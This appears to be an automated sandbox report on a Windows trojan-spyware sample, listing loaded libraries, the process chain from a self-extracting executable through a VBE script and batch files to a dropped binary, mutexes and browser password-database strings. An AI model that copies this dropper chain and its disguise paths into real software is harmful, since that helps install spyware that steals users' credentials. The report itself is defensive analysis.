                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: version.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: slc.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: version.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: mmdevapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: ksuser.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: avrt.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: audioses.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: midimap.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: dpapi.dllJump to behavior
                          Source: hT7clR9Gz2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/298@1/1
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007C6C74 GetLastError,FormatMessageW,0_2_007C6C74
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_007DA6C2
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exeJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\WSdqVQmD.logJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeMutant created: \Sessions\1\BaseNamedObjects\Local\e8fe068570dcd838da88829fda50fd8543d8e8796401a59cf131a8ee6553e22a
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_03
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\AppData\Local\Temp\qPf8SkqAM6Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\jweBRAt.bat" "
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCommand line argument: sfxname0_2_007DDF1E
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCommand line argument: sfxstime0_2_007DDF1E
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCommand line argument: STARTDLG0_2_007DDF1E
                          Source: hT7clR9Gz2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeFile read: C:\Windows\win.iniJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: T7T0P50D7R.12.dr, GI1QFe5QqZ.12.dr, gzTU2seUsB.12.dr, 27MASnDHSg.12.dr, lE6UR85WKz.12.dr, KLvsz30bz4.12.dr, n148ZpNIwb.12.dr, oqFl7XSvEv.12.dr, AKDH41EzpE.12.dr, lckuK0yQ4O.12.dr, w6GAlImk8G.12.dr, oT8YCJXKiH.12.dr, abtFDYwehm.12.dr, tCmc5lkfzK.12.dr, e4asmUBmlB.12.dr, IxPKP3WGLZ.12.dr, p1jpowXL9D.12.dr, oH1Zi8eQpO.12.dr, VGPU8QeqXy.12.dr, y7vsR4YYHe.12.dr, ZTDbDOsSJK.12.dr, HPvj9VE44q.12.dr, W8yaX42fQq.12.dr, kZylymcOcu.12.dr, X4hdzOtESZ.12.dr, pgeYHh0N2I.12.dr, xb5DnYyn9a.12.dr, bIXPyrLTqt.12.dr, gE8WDfj00B.12.dr, Q9sNAKkP1l.12.dr, WBn5a3ayp2.12.dr, AMKhQYWbJ2.12.dr, HLl50hpTKF.12.dr, XaQTNye7CL.12.dr, 5nu40OM4wz.12.dr, H8kF97s8Ir.12.dr, NAnSokyMHL.12.dr, EjdV0WJJNZ.12.dr, k1YQZ8teOb.12.dr, gOZ7h2Wxig.12.dr, PguEmYukX2.12.dr, 2e7zlRBEdB.12.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: hT7clR9Gz2.exeReversingLabs: Detection: 55%
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeFile read: C:\Users\user\Desktop\hT7clR9Gz2.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\hT7clR9Gz2.exe C:\Users\user\Desktop\hT7clR9Gz2.exe
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\jweBRAt.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\PortCommon\hyperbrokerhostNetsvc.exe C:\PortCommon/hyperbrokerhostNetsvc.exe
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Uhg5bQrQMo.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe "C:\Program Files (x86)\mozilla maintenance service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe"
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\jweBRAt.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\PortCommon\hyperbrokerhostNetsvc.exe C:\PortCommon/hyperbrokerhostNetsvc.exeJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Uhg5bQrQMo.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe "C:\Program Files (x86)\mozilla maintenance service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exeJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\56085415360792Jump to behavior
                          Source: hT7clR9Gz2.exeStatic file information: File size 2733200 > 1048576
                          Source: hT7clR9Gz2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: hT7clR9Gz2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: hT7clR9Gz2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: hT7clR9Gz2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: hT7clR9Gz2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: hT7clR9Gz2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: hT7clR9Gz2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: hT7clR9Gz2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: wC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000426E000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: zC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004987000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
